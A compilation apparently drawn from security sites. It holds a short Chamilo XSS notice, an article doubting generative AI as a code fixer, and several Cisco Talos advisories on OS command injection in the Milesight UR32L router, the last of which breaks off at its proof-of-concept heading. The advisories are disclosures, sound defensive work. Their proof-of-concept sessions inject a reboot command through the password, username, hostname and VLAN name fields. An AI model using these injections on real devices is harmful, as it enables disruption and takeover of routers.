Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the careers & promotions management section.

CVE-2023-37063: Security issues - Chamilo LMS

Not yet — but it can help make incremental progress in reducing vulnerability backlogs.

Organizations worldwide are in a race to adopt AI technologies into their cybersecurity programs and tools. A majority (65%) of developers use or plan on using AI in testing efforts in the next three years. There are many security applications that will benefit from generative AI, but is fixing code one of them?

For many DevSecOps teams, generative AI represents the holy grail for clearing their increasing vulnerability backlogs. Well over half (66%) of organizations say their backlogs are comprised of more than 100,000 vulnerabilities, and over two-thirds of static application security testing (SAST) reported findings remain open three months after detection, with 50% remaining open after 363 days. The dream is that a developer could simply ask ChatGPT to "fix this vulnerability," and the hours and days previously spent remediating vulnerabilities would be a thing of the past.

It's not an entirely crazy idea, in theory. After all, machine learning has been used effectively in cybersecurity tools for years to automate processes and save time — AI is hugely beneficial when applied to simple, repetitive tasks. But applying generative AI to complex code applications has some flaws, in practice. Without human oversight and express command, DevSecOps teams could end up creating more problems than they solve.

**Generative AI Advantages and Limitations Related to Fixing Code**

AI tools can be incredibly powerful tools for simple, low-risk cybersecurity analysis, monitoring, or even remedial needs. The concern arises when the stakes become consequential. This is ultimately an issue of trust.

Researchers and developers are still determining the capabilities of new generative AI technology to produce complex code fixes. Generative AI relies on existing, available information in order to make decisions. This can be helpful for things like translating code from one language to another, or fixing well-known flaws. For example, if you ask ChatGPT to "write this JavaScript code in Python," you are likely to get a good result. Using it to fix a cloud security configuration would be helpful because the relevant documentation to do so is publicly available and easily found, and the AI can follow the simple instructions.

However, fixing most code vulnerabilities requires acting on a unique set of circumstances and details, introducing a more complex scenario for the AI to navigate. The AI might provide a "fix," but without verification, it should not be trusted. Generative AI, by definition, can't create something that is not already known, and it can experience hallucinations that result in fake outputs.

In a recent example, a lawyer is facing serious consequences after using ChatGPT to help write court filings that cited six nonexistent cases the AI tool invented. If AI were to hallucinate methods that do not exist and then apply those methods to writing code, it would result in wasted time on a "fix" that can't be compiled. Additionally, according to OpenAI's GPT-4 whitepaper, new exploits, jailbreaks, and emergent behaviors will be discovered over time and be difficult to prevent. So careful consideration is required to ensure AI security tools and third-party solutions are vetted and regularly updated to ensure they do not become unintended backdoors into the system.

**To Trust or Not to Trust?**

It's an interesting dynamic to see the rapid adoption of generative AI play out at the height of the zero-trust movement. The majority of cybersecurity tools are built on the idea that organizations should never trust, always verify. Generative AI is built on the principle of inherent trust in the information made available to it by known and unknown sources. This clash in principles seems like a fitting metaphor for the persistent struggle organizations face in finding the right balance between security and productivity, which feels particularly exacerbated at this moment.

While generative AI might not yet be the holy grail DevSecOps teams were hoping for, it will help to make incremental progress in reducing vulnerability backlogs. For now, it can be applied to make simple fixes. For more complex fixes, they'll need to adopt a verify-to-trust methodology that harnesses the power of AI guided by the knowledge of the developers who wrote and own the code.

Can Generative AI Be Trusted to Fix Your Code?

An OS command injection vulnerability exists in the ys_thirdparty system_user_script functionality of Milesight UR32L v32.3.0.5. A specially crafted series of network requests can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the ys\_thirdparty system\_user\_script functionality of Milesight UR32L v32.3.0.5. A specially crafted series of network requests can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router setting.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities. The number of functionalities depends also on the user privileges. Indeed, the admin user can access the enable command, which will allow access to a highly privileged command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

Issuing the configure terminal makes it possible to access the user_permission command that allows user related actions:

    ROUTER(user-permission)# 
      end        End current mode and change to enable mode
      exit       Exit current mode and down to previous mode
      list       Print command list
      no         remove the user
      show       show the user information
      superuser  set superuser name or password
      user       check the user password
    

The user command allows several modifications of user related data. If the command is issued as user <username> name <new_username> or user <username> password <new_password>, this will modify, respectively, the username or the password of an existing user. The command is managed by the ys_thirdparty’s rwuser_set function:

    undefined4 rwuser_set(undefined4 param_1,undefined4 param_2,undefined4 param_3,char **argv)
    
    {
      [... variable declaration ...]
    
      username = *argv;
      is_equal = strcmp(username,superuser);
      if (is_equal == 0) {
        vty_out(param_2,"[failed]:user %s is superuser, use another command to modify\n",username);
        return 0;
      }
      user_element = (rwuser_element *)rwuser_find_by_username(username);
      if (user_element == (rwuser_element *)0x0) {
        is_equal = check_system_user(username);
        if (is_equal != 0) {
          delete_user_real(*argv,0);
        }
        vty_out(param_2,"the user %s is not exist!\n",*argv);
        return 1;
      }
      if (*argv[1] == 'n') {
        [...]
      }
      else {
        is_equal = user_input_invalid_without_check_super(0,argv[2]);
        [...]
        is_ok = modify_user_password(user_element,argv[2],1);                                               [1]
        [...]
      }
      [...]
    }
    

After ensuring that the provided user exists, if the command provided looks like user <username> password <new_password>, eventually, the function modify_user_password, at [1], will be reached. The argv[2] value corresponds to the provided password. This function is used for modifying the user’s password:

    bool modify_user_password(rwuser_element *rwuser_element,char *password,undefined *clear_pass)
    
    {
      [... variable declaration ...]
    
      if (rwuser_element->password != (char *)0x0) {
        zfree(1);
        rwuser_element->password = (char *)0x0;
      }
      password_copy = (char *)zstrdup(1,password);
      rwuser_element->clear_pass = clear_pass;
      rwuser_element->password = password_copy;
      iVar1 = system_user_script(setpass,rwuser_element,clear_pass);
      [...]
    }
    

After some assignment the system_user_script function will be called:

    void system_user_script(user_script_action action,rwuser_element *rwuser,undefined4 clear_pass)
    
    {
      [... variable declaration ...]
    
      [... variable initialization ...]
      escaped_password_ptr = transfer_dolloar(rwuser->password);                                            [2]
      snprintf(escaped_password_buff,0x80,"%s",escaped_password_ptr);
      if (action == userdel) {
       [...]
      }
      else {
        if (action == setpass) {
          username = rwuser->username;
          format_string = "%s setpass %d %s \"%s\"";
        }
        else {
          [...]
        }
        snprintf(command_buffer,0x100,format_string,"/usr/sbin/userpermit.sh",clear_pass,username,
                 escaped_password_buff);                                                                    [3]
      }
      system(command_buffer);                                                                               [4]
      [...]
    } This function will execute, based on the argument `action`, different functionalities. In the code path we are considering, the `action` is equal to `setpass`, so it will set a new password for the specified user. This functions starts by escaping, at `[2]`, the dollar sign and the slash characters from the provided password. Then this escaped password will be used at `[3]` to compose the `/usr/sbin/userpermit.sh setpass 1 <username> "<password>"` string, which will be used as argument, at `[4]`, for the `system` function. 
    

Because no checks about the password provided are performed from issuing the command until [3], an OS command injection exists in the modify_user_password function that allows arbitrary command execution as privileged user.

**Exploit Proof of Concept**

Following a POC triggering a reboot of the system through the command injection exposes above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable
    ROUTER# configure terminal 
    ROUTER(config)# user_permission
    ROUTER(user-permission)# user POC password `reboot`
    ROUTER(user-permission)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device rebooting. The user POC must exists to reach the vulnerable code.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-24595: TALOS-2023-1713 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the ys_thirdparty user_delete functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the ys\_thirdparty user\_delete functionality of Milesight UR32L v32.3.0.5. A specially crafted network packet can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-77 - Improper Neutralization of Special Elements used in a Command (‘Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the router console. This is an interactive shell to modify the router settings.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities. The number of functionalities depends on the user privileges. The admin user can access the enable command, which will allow access to a high privilege command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

Issuing the configure terminal command makes it possible to access the user_permission command. This allows access to a menu where it is possible to manage user-related information:

    ROUTER(user-permission)# 
      end        End current mode and change to enable mode
      exit       Exit current mode and down to previous mode
      list       Print command list
      no         remove the user
      show       show the user information
      superuser  set superuser name or password
      user       check the user password
    

The no user <username> command removes the user associated with the issued username. This command is manage by the ys_thirdparty’s user_delete function:

    undefined4 user_delete(undefined4 param_1,undefined4 param_2,undefined4 param_3,char **argv)
    
    {
      [... variable declaration ...]
    
      username = *argv;
      iVar1 = strcmp(username,superuser);
      if (iVar1 == 0) {
        username = "[failed]:can not remove superuser!\n";
      }
      else {
        iVar1 = delete_user_real(username,0);
        [...]
      }
      [...]
    }
    

If the username provided is not the superuser, this function will call the delete_user_real function:

    uint delete_user_real(char *username,uint is_delete_super_user)
    
    {
      [... variable declaration ...]
    
      [...]
      is_superuser = strcmp(username,superuser);
      if ((is_superuser | is_delete_super_user) == 0) {
        tmp_var = 1;
      }
      else {
        [...]
        tmp_var = check_system_user(username);
        [...]
      }
      [...]
    }
    

This one, after a check about the superuser, could call the check_system_user with the provided username:

    void check_system_user(char *user)
    
    {
      [... variable declaration ...]
    
      iVar1 = __stack_chk_guard;
      popen_command._0_4_ = 0;
      memset(popen_command + 4,0,0xfc);
      snprintf(popen_command,0x100,"%s chk 0 %s","/usr/sbin/userpermit.sh",user);                           [1]
      __stream = popen(popen_command,"r");                                                                  [2]
      [...]
    }
    

This function will compose, at [1], the "/usr/sbin/userpermit.sh chk 0 <username>" string and use it as argument for the popen function at [2]. From the user_delete function until the popen call at [2] there is no check for the username provided, so this can lead to a command injection vulnerability at [2].

**Exploit Proof of Concept**

Following a POC triggering a reboot of the system through the command injection exposes above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable
    ROUTER# configure terminal
    ROUTER(config)# user_permission
    ROUTER(user-permission)# no user `reboot`
    ROUTER(user-permission)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device rebooting

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-23550: TALOS-2023-1694 || Cisco Talos Intelligence Group

An os command injection vulnerability exists in the libzebra.so change_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**SUMMARY**

An os command injection vulnerability exists in the libzebra.so change\_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-77 - Improper Neutralization of Special Elements used in a Command (‘Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router settings.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities, the number of functionalities depends also on the user privileges. Indeed, the admin user can access the enable command, that will allow to access an high privileges command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

The command that we are going to analyze is called hostname. This function is called as hostname <new_hostname> and is used to change hostname for the device. This command is in the sub-menu reachable through the configure terminal command:

    ROUTER# configure terminal 
    ROUTER(config)# 
      [...]
      hostname              Set system's network name
      [...]
    

The libzebra.so.0.0.0’s hostname_command function is responsible for managing the hostname command:

    undefined4 hostname_command(undefined4 param_1,int param_2,undefined4 param_3,byte **argv)
    
    {
      undefined4 uVar1;
      char *pcVar2;
    
      if (0x19 < (**argv | 0x20) - 0x61) {
        [...]
      }
      uVar1 = change_hostname_wrap(argv);
      return uVar1;
    }
    

This function will check if the provided hostname starts with a letter of the alphabet, then the change_hostname_wrap function will be called with the new hostname. The function change_hostname_wrap will check if the current hostname differs from the new one, in such case the function change_hostname will be eventually called:

    void change_hostname(char *new_hostname)
    
    {
      int iVar1;
      char change_hostname_command [128];
    
      iVar1 = __stack_chk_guard;
      change_hostname_command._0_4_ = 0;
      memset(change_hostname_command + 4,0,0xfc);
      snprintf(change_hostname_command,0x100,"uci set system.@system[0].hostname='%s';uci commit",
               new_hostname);                                                                                       [1]
      system(change_hostname_command);                                                                              [2]
      [...]
    }
    

This function will compose, at [1], the uci set system.@system[0].hostname='<new_username>';uci commit string. The composed string will then be executed, at [2], using the system function. The change_hostname function is vulnerable to a command injection vulnerability, indeed, the new_hostname parameter it will reach the system function and the hostname command does only checks if the first character is alphabetic, this is not enough to prevent a command injection.

**Exploit Proof of Concept**

Following a POC triggering a reboot of the system through the command injection exposes above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable
    ROUTER#  configure terminal
    ROUTER(config)# hostname a'$(reboot)'
    old hostname null
    a(config)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device that is rebooting.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-22659: TALOS-2023-1699 || Cisco Talos Intelligence Group

Two OS command injection vulnerabilities exist in the zebra vlan_name functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is in the code branch that manages a new vlan configuration.

**SUMMARY**

Two OS command injection vulnerabilities exist in the zebra vlan\_name functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router settings.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities. The number of functionalities depends on the user privileges. Indeed, the admin user can access the enable command, which will allow access to a highly privileged command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

Issuing the configure terminal command permits access to the vlan <VLAN ID> command that allows configuration of a vlan. Several configurations are available for the vlan, one of which is the command name <vlan name>, used to add a name to the vlan and set up a network interface accordingly.

An example of using this functionality is the following one:

    ROUTER> enable 
    ROUTER# configure terminal 
    ROUTER(config)# vlan 1000
    ROUTER(config-switch)# name new
    

This will add the network interface named new and assign to it the vlan id 1000. The function responsible for managing the name <vlan name> command is the zebra’s vlan_name function. This function is vulnerable to two OS command injections through the <vlan name> field. Following are the details for the two vulnerabilities.

**CVE-2023-25582 - replace vlan name**

Following is the relevant portion of the vlan_name function that manages an already-existing vlan configuration:

    void vlan_name(undefined4 param_1,int vty,undefined4 argc,char **argv)
    
    {
      [... variable declaration ...]
    
      [...]
      config_switch_info = vty->config_switch_info;
      does_interfafce_exist = (switch_node *)check_ifname_exist(*argv);
      if (does_interfafce_exist == (switch_node *)0x0) {
        pthread_mutex_lock((pthread_mutex_t *)switch_if_lock);
        for (switch_node_iterator = switch_if; switch_node_iterator != (switch_node *)0x0;
            switch_node_iterator = switch_node_iterator->next) {                                            [1]
          if (switch_node_iterator->vlan_id == config_switch_info->current_vlan) {                          [2]
            interface_name = switch_node_iterator->interface_name;
            if (interface_name != (char *)0x0) {
              [... delete old interface ...]
            }
            new_interface_name = zstrdup(1,*argv);
            switch_node_iterator->interface_name = new_interface_name;
            [...]
            snprintf(shell_command,100,"ip link add link %s name %s type vlan id %d","eth0",
                     new_interface_name,switch_node_iterator->vlan_id);                                     [3]
            system(shell_command);                                                                          [4]
            [...]
            }
          }
        }
        [...]
      }
      [...]
    }
    

The vlan_name function iterates at [1] through all the registered vlan configurations. If one of the existing vlan configurations matches the selected vlan id with the already registered one, at [2], eventually the code at [3] will be reached. At [3] the "ip link add link eth0 name <provided interface name> type vlan id <provided vlan id>" string is composed and then executed through the system function at [4]. Because no checks regarding the interface provided is perfomed, this vlan_name’s branch is vulnerable to an OS command injection vulnerability.

**Exploit Proof of Concept**

Following is a POC triggering a reboot of the system through the command injection exposed above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable 
    ROUTER# configure terminal 
    ROUTER(config)# vlan 1000
    ROUTER(config-switch)# name new
    ROUTER(config-switch)# name old`reboot`
    ROUTER(config-switch)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device rebooting.

**CVE-2023-25583 - new vlan name**

Following the relevant portion of the vlan_name function that manages a new vlan configuration:

    void vlan_name(undefined4 param_1,int vty,undefined4 argc,char **argv)
    
    {
      [... variable declaration ...]
    
      [...]
      config_switch_info = vty->config_switch_info;
      does_interfafce_exist = (switch_node *)check_ifname_exist(*argv);
      if (does_interfafce_exist == (switch_node *)0x0) {
        pthread_mutex_lock((pthread_mutex_t *)switch_if_lock);
        for (switch_node_iterator = switch_if; switch_node_iterator != (switch_node *)0x0;
            switch_node_iterator = switch_node_iterator->next) {                                            [5]
          [...]
        }
        [...]
        if (switch_node_iterator == (switch_node *)0x0) {
          new_switch = (switch_node *)zcalloc(1,0xc);
          if (new_switch == (switch_node *)0x0) {
            [...]
          }
          else {
            interface_name = *argv;
            new_switch->vlan_id = config_switch_info->current_vlan;
            interface_name_copy = zstrdup(1,interface_name);
            new_switch->interface_name = interface_name_copy;
            if (interface_name_copy != 0) {
              [...]
              snprintf(shell_command,100,"ip link del %s",new_switch->interface_name);                      [6]
              system(shell_command);                                                                        [7]
              [...]
            }
            [...]
          }
          [...]
        }
      }
      [...]
    }
    

The vlan_name function iterates at [5] through all the registered vlan configurations. If the selected vlan id is not in the in the list, the code at [6] will eventually be executed. At [6] the "ip link del <provided interface name>" string is composed and then executed at [7] through the system function. Because no checks regarding the interface provided are perfomed, this vlan_name’s branch is vulnerable to an OS command injection vulnerability.

**Exploit Proof of Concept**

Following is a POC triggering a reboot of the system through the command injection exposed above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable 
    ROUTER# configure terminal 
    ROUTER(config)# vlan 100
    ROUTER(config-switch)# name new`reboot`
    ROUTER(config-switch)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device rebooting.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-25583: TALOS-2023-1723 || Cisco Talos Intelligence Group

An OS command injection vulnerability exists in the ys_thirdparty check_system_user functionality of Milesight UR32L v32.3.0.5. A specially crafted set of network packets can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

An OS command injection vulnerability exists in the ys\_thirdparty check\_system\_user functionality of Milesight UR32L v32.3.0.5. A specially crafted set of network packets can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial radio router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router setting.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities; the number of functionalities depends on the user privileges. Indeed, the admin user can access the enable command, which will allow access to a highly privileged command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

Issuing the configure terminal makes it possible to access the user_permission command that allows user related actions:

    ROUTER(user-permission)# 
      end        End current mode and change to enable mode
      exit       Exit current mode and down to previous mode
      list       Print command list
      no         remove the user
      show       show the user information
      superuser  set superuser name or password
      user       check the user password
    

The user command allows several modifications of user related data. If the command is issued as user <username> name <new_username> or user <username> password <new_password>, this will modify, respectively, the username or the password of an existing user. The command is managed by the ys_thirdparty’s rwuser_set function:

    undefined4 rwuser_set(undefined4 param_1,undefined4 param_2,undefined4 param_3,char **argv)
    
    {
      int is_superuser;
      char **does_exist;
      char *username;
    
      username = *argv;
      is_superuser = strcmp(username,superuser);
      if (is_superuser == 0) {
        vty_out(param_2,"[failed]:user %s is superuser, use another command to modify\n",username);
        return 0;
      }
      does_exist = (char **)rwuser_find_by_username(username);
      if (does_exist == (char **)0x0) {
        is_superuser = check_system_user(username);
        [...]
      }
      [...]
    }
    

This function will check in two different lists of users, the “service” user ones and the ones that are actually linux system user. If the username provided does not correspond with some “service” user, the username provided will be checked against the linux users through the check_system_user function:

    void check_system_user(char *user)
    
    {
      int iVar1;
      FILE *__stream;
      FILE *pFVar2;
      char popen_command [256];
    
      iVar1 = __stack_chk_guard;
      popen_command._0_4_ = 0;
      memset(popen_command + 4,0,0xfc);
      snprintf(popen_command,0x100,"%s chk 0 %s","/usr/sbin/userpermit.sh",user);                                   [1]
      __stream = popen(popen_command,"r");                                                                          [2]
      [...]
    }
    

This function will compose, at [1], the string /usr/sbin/userpermit.sh chk 0 <username>, and then at [2] will execute it with the popen function. Because no checks about the provided username are performed, from issuing the command until [2], a command injection exists in check_system_user that allows arbitrary command execution as privileged user.

**Exploit Proof of Concept**

Following a POC triggering a reboot of the system through the command injection exposes above:

